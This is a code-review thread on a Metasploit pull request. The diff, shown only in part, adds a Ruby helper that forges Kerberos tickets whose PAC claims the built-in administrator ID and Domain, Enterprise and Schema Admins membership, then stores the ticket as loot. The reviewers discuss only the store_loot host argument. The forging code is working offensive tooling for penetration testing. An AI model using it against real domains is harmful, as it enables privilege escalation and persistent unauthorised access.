lib/msf/core/exploit/remote/kerberos/ticket.rb

```diff
@@ -0,0 +1,134 @@
+# -*- coding: binary -*-
+
+require 'date'
+
+module Msf
+  class Exploit
+    class Remote
+      module Kerberos
+        module Ticket
+          def create_ticket(enc_key:, start_time:, end_time:, sname:, flags:, domain:, username:, domain_sid:, save_ccache: true)
+            sname_principal = create_principal(sname)
+            cname_principal = create_principal(username)
+            group_ids = [
+              Rex::Proto::Kerberos::Pac::DOMAIN_USERS,
+              Rex::Proto::Kerberos::Pac::DOMAIN_ADMINS,
+              Rex::Proto::Kerberos::Pac::GROUP_POLICY_CREATOR_OWNERS,
+              Rex::Proto::Kerberos::Pac::SCHEMA_ADMINISTRATORS,
+              Rex::Proto::Kerberos::Pac::ENTERPRISE_ADMINS,
+            ]
+            opts = {
+              client: cname_principal,
+              server: sname_principal,
+              auth_time: start_time,
+              start_time: start_time,
+              end_time: end_time,
+              renew_till: end_time,
+              realm: domain.upcase,
+              key_value: enc_key,
+              checksum_enc_key: enc_key,
+              secure_random_key: SecureRandom.hex(8),
+              user_id: 500,
+              group_ids: group_ids,
+              checksum_type: Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5,
+              client_name: username,
+              domain_id: domain_sid,
+              flags: flags
+            }
+
+            ticket_enc_part = create_enc_ticket_part(opts: opts)
+            enc_part = encrypt_ticket_enc_part(ticket_enc_part: ticket_enc_part, key: opts[:key_value])
+            ticket = Rex::Proto::Kerberos::Model::Ticket.new(
+              tkt_vno: Rex::Proto::Kerberos::Model::VERSION,
+              realm: opts[:realm],
+              sname: opts[:server],
+              enc_part: enc_part
+            )
+            if save_ccache
+              ccache = generate_ccache(ticket, opts: opts)
+              path = store_loot('kerberos_ticket.ccache', 'application/octet-stream', domain, ccache.encode)
```

Comment:
Just with the above comment; I believe this should be:

```suggestion
              path = store_loot('kerberos_ticket.ccache', 'application/octet-stream', nil, ccache.encode)
```

Since we don't have a host that we're targeting, just a domain. Happy to wait for Spencer/Jeffrey to validate this assumption though.

Reply:
This seems right to me but it's a shame the file name has `unknown` in it, no real way to tell which ticket is which